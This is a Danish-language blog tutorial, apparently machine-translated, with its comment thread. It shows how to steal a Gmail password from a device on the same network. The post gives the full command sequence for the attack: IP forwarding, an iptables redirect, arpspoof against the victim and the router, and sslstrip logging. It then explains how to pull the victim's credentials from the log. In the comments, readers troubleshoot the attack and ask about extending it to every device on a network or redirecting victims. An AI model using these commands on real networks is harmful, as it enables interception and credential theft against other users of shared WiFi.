ArpSpoofing og SSlstrip i aktion.

Hej bloggere.

I dag har jeg en lille prøve af, hvor farligt det kan være at være forbundet til ethvert usikret netværk af dem, som så mange af os kan lide.

I dag skal jeg bruge ArpSpoofing med Sslstrip til at få en Gmail-adgangskode. For at gøre miljøet mere kontrolleret har jeg oprettet en konto kaldet "testarp@gmail.com".

Og da jeg ikke kan lide præamblerne meget, lad os komme i gang.

Jeg er ikke ansvarlig på noget tidspunkt for, hvad de kan gøre med følgende oplysninger. Jeg gør det udelukkende til uddannelsesmæssige formål

MILJØ

Hvad vi har til denne test er følgende:

1. angriber: Det er min stationære eller stationære computer, der har Debian Wheezy. Fra arkiver kan du installere sslstrip y dsniff at få at have harpespoofing

2. Offer: Offeret er en Android-tablet, der kun vil se sin mail gennem browseren.

3. Mediet: Midten er min Cisco DPC2425-router

ADRESSER.

Angriber adresse: 172.26.0.2

Router-adresse: 172.26.0.1

Offerets adresse: 172.26.0.8

Angrebet:

For at forstå lidt mere, hvordan angrebet fungerer, kan du gå til min gamle POST

Den første ting, vi vil gøre for dette angreb, er at aktivere forward, så vores computer kan videresende informationen til offeret uden at de er klar over det. (Ellers ville det være et angreb på denial of services)

Til det vil vi bruge:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Hver kommando i et direkte konsolvindue.

Hvis vi nu gør hale -f desdelinux vi ser informationen live og direkte

øjebliksbillede1

Så hvordan får vi det, vi ønsker?

Lad os først indtaste vores mail på tabletten. Mens vi logger ind, ser vi, at tusinder og tusinder af ting vises på vores konsol.

Nu hvor det er færdigt, lad os åbne vores fil "desdelinux” med nano

nano desdelinux

med Control + W søger vi efter noget, der hedder SIKKER POST.

Og vi vil se noget som dette.

øjebliksbillede2

Blandt den enorme linje, der ikke kan ses, er offerets e-mail og adgangskode.

Så vi løber til højre, indtil vi endelig ser lyset ved enden af ​​tunnelen.

øjebliksbillede3

Ved en anden lejlighed vil vi se, hvordan vi kan beskytte os lidt mod disse angreb.

hilsen


Efterlad din kommentar

Din e-mailadresse vil ikke blive offentliggjort. Obligatoriske felter er markeret med *

*

*

  1. Ansvarlig for dataene: Miguel Ángel Gatón
  2. Formålet med dataene: Control SPAM, management af kommentarer.
  3. Legitimering: Dit samtykke
  4. Kommunikation af dataene: Dataene vil ikke blive kommunikeret til tredjemand, undtagen ved juridisk forpligtelse.
  5. Datalagring: Database hostet af Occentus Networks (EU)
  6. Rettigheder: Du kan til enhver tid begrænse, gendanne og slette dine oplysninger.

  1.   @Jlcmux sagde han

    Jeg benytter lejligheden til at sige, at da indlægget blev offentliggjort, var kommandoerne ikke rigtige.

    Kommandoen iptables i slutningen mangler 8080, som er på en anden linje. Og så var arpspoof-kommandoerne alle på samme linje. Hver kommando er på en anden linje.

    Forhåbentlig ser redaktøren det og kan ordne det.

    Greetings.

    1.    Kildens manual sagde han

      Jeg har foretaget de rettelser, du nævner, er det okay?

      Hvis du vil indsætte kode i en foretrukken post, skal du bruge HTML-visningen og kontrollere, at artiklen er korrekt, inden du sender den til afventende. Tak skal du have.

  2.   Luis sagde han

    Det er koldt at vide, at de af os, der ikke har viden, er så sårbare. Meget god information, selv når jeg forstår lidt af emnet, indser jeg vigtigheden. Tak skal du have!
    hilsen

  3.   giskard sagde han

    Men det fungerer kun, hvis angriberen og offeret er på samme netværk. Under alle omstændigheder ser det ud til, at hvis du (ved at være på det samme netværk) opretter du forbindelse via HTTPS, sker det ikke, fordi dataene er krypteret, FØR du forlader din maskine. Hvis du opretter forbindelse via HTTP (uden S), tror jeg, at selv når du ser på netværkskablet, ser du nøglerne.

    1.    @Jlcmux sagde han

      Det er ikke sandt. Jeg hacker en gmail-adgangskode, og hvis du bemærker, bruger gmail https. Så? Pointen er, at selvom https er sikker, afhænger det af http. Så det er ikke så sikkert.

      Tilstå ikke så meget om en https, at S ikke er for Superman, det er for "sikkert"

    2.    Rten sagde han

      det fungerer med eller uden https, jeg har prøvet det med en mere specialiseret Linux distro, og det fungerer uden problemer

    3.    Kildens manual sagde han

      Du kan præcist bruge det til at lære dem, der stjæler dit Wi-Fi, en lektion. 😀

      Det ligner mere eller mindre, hvad de sagde for længe siden på Chema Alonsos blog:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant sagde han

        Ostia, det er fantastisk! / Og så fortæller de min paranoide hver gang jeg bruger VPN, når de går for at kontrollere bankkontoen ...) Forresten skal du se, hvor kyniske mennesker er i kommentarerne ... hvis det til sidst stjæler ...

        1.    eliotime3000 sagde han

          Nu skal vi tage en tutorial om, hvordan du opretter og tilbyder din egen VPN-tjeneste.

      2.    Daniel sagde han

        Historien, som du linker til, er meget interessant, den virker endda værdig til en romanbog, og det får mig til at huske, da jeg brugte mine naboers internet, og selvom jeg siger, at jeg kender emnet, tror jeg, jeg aldrig kunne se de sande dimensioner faren for at jeg kunne have holdt, heldigvis for mig, ændrede de kun adgangskoden til WPA2, og det var her min historie med internetudbyderen begyndte haha

    4.    Mauritius sagde han

      Derfor siger titlen Sslstrip i aktion.

      Det fungerer, så længe angriberen er i midten

  4.   anon sagde han

    Hvilken bølge arbejder du med prisme? -.-
    no.
    Hvad venter du på at sende din anmodning XD
    hensyn
    godt indlæg

  5.   auroszx sagde han

    Interessant, jeg laver en pædagogisk test senere ... Måske kunne jeg endda fjerne adgangskoden til WiFi og have det sjovt lidt 😛
    Kan du med en chance gøre noget lignende for at sende forskellige sider til dem, det mål, du har anmodet om? For eksempel vil de åbne Facebook, og jeg omdirigerer dem til Google? 😛

    1.    @Jlcmux sagde han

      Ja. Men det hele er en meget anden rulle.

      Måske sender jeg det senere.

  6.   sidste nybegynder sagde han

    meget godt indlæg, disse emner er meget lærerige, nu skal vi være i stand til at imødegå dette angreb, da nogle (som mig) opretter forbindelse til offentlige netværk (f.eks. universitetet) ville det være nyttigt at undgå det.

    Greetings!

  7.   bare en anden-dl-bruger sagde han

    Det fungerede ikke for mig 🙁

  8.   wow sagde han

    Noget fejler mig her, bortset fra at https-forbindelser er krypteret via et servercertifikat (når du har certifikatet på din maskine, er din browser ansvarlig for krypteringen) med iptables omdirigerer du port 80 (http) , ikke 443, hvilket er https

    1.    @Jlcmux sagde han

      Det troede jeg også. Pointen er, at selvom https er "sikker", afhænger det desværre af http. Så sslstrip drager fordel af det, det får browseren til at tro, at det bruger https-legitimationsoplysninger, men det er det ikke.

      1.    wow sagde han

        hellig lort! men browseren skal se en advarsel som "dette certifikat kommer fra et mistænkeligt websted eller noget lignende" ... Jeg bliver bestemt nødt til at lave test XD

        1.    @Jlcmux sagde han

          Nej, absolut intet kommer ud.

  9.   bare en anden-dl-bruger sagde han

    Det fungerede endelig for mig
    Jeg har forbindelse til et WEP-netværk med adgangskode, og det viste mig adgangskoden direkte alligevel.

    En forespørgsel. Kan du udføre den samme procedure, men for alle de computere, der er forbundet i netværket, i stedet for at have et enkelt offer?

    1.    @Jlcmux sagde han

      Ja du kan. Men jeg har ikke gjort eksperimenter. Prøv det selv og fortæl os, hvordan det går.

  10.   Sinnick 19 sagde han

    Det eneste jeg får med dette er, at offerets maskine går offline, men sslstripen viser mig ikke noget: /

    1.    @Jlcmux sagde han

      Du skal deaktivere firewallen et øjeblik. Eller i det mindste aktivere indgående forbindelser.

  11.   Hr. Sort sagde han

    Probe og jeg kunne kun se brugernavnet og adgangskoden på facebooksiden, i gmail fandt jeg ikke noget resultat i loggen, og jeg havde kun brug for en linje med arpspoof «arpspoof -i -t«. På den anden side kunne offermaskinen ikke åbne nogle sider. Jeg vil fortsætte med at undersøge, det er meget interessant. En hjælp til dem, der bruger Manjaro, pakkerne, der skal installeres, er: dsniff (her er arpspoff), snoet og python2-pyopenssl. Sslstrip kan downloades herfra: http://www.thoughtcrime.org/software/sslstrip/
    For at køre det $ python2 sslstrip.py
    Greetings.

  12.   Hr. Sort sagde han

    Det kom ikke ud, men arpspoof-linjen er: #arpspoof -i int -t ip-victim ip-router

  13.   gilbert sagde han

    se jeg gør nøjagtigt hvad du siger:

    ekko "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Problemet er, at offeret, som er en anden pc, som jeg har her på mit værelse, efterlades uden forbindelse til det punkt, at jeg skal genstarte routeren, hvad kan jeg gøre, hjælp mig.

    En anden ting, jeg arbejder med en virtuel maskine, og når jeg udfører iwconfig-kommandoen, vises wlan0 ikke, heller ikke når jeg udfører ifconfig, men hvis jeg har internet på min virtuelle maskine, hvad med en eth0-grænseflade.